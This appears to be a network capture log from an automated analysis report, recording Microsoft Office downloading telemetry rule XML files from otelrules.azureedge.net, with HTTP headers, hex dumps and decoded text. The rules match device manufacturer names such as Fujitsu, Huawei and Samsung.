                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        31192.168.2.54974113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:32 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:32 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                        x-ms-request-id: 95105883-701e-001e-6118-3df5e6000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011332Z-178bfbc474bwlrhlhC1NYCy3kg000000058000000000bgq7
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        32192.168.2.54974213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:32 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:32 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                        x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011332Z-15b8b599d882l6clhC1TEBxd5c00000003hg00000000f1md
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:32 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        33192.168.2.54974313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:32 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:32 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                        x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011332Z-178bfbc474btvfdfhC1NYCa2en00000005b0000000008gc3
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        34192.168.2.54974413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:32 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:33 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                        x-ms-request-id: 57389be4-e01e-0003-606c-3c0fa8000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011333Z-174c587ffdf9xbcchC1TEBxkz400000003g000000000mp5h
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:33 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        35192.168.2.54974513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:34 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:34 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                        x-ms-request-id: 3eb19cd4-801e-00ac-194b-3cfd65000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011334Z-15b8b599d882l6clhC1TEBxd5c00000003s00000000000c2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:34 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        36192.168.2.54974613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:34 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:35 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                        x-ms-request-id: 8017546c-101e-000b-4720-3d5e5c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011335Z-178bfbc474bbcwv4hC1NYCypys00000005700000000012bc
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        37192.168.2.54974713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:34 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:35 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                        x-ms-request-id: 12cef178-a01e-0070-7e6c-3d573b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011335Z-174c587ffdfldtt2hC1TEBwv9c00000003mg0000000076kh
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        38192.168.2.54974813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:34 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:35 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                        x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011335Z-174c587ffdftjz9shC1TEBsh9800000003ng000000005e7t
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        39192.168.2.54974913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:35 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:35 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                        x-ms-request-id: 375df28d-601e-00ab-5b0b-3d66f4000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011335Z-178bfbc474bmqmgjhC1NYCy16c00000005bg000000007mn2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:35 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        40192.168.2.54975013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:36 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:36 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                        x-ms-request-id: 03bcf0c5-601e-0002-337d-3da786000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011336Z-15b8b599d885ffrhhC1TEBtuv000000003q000000000n89n
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
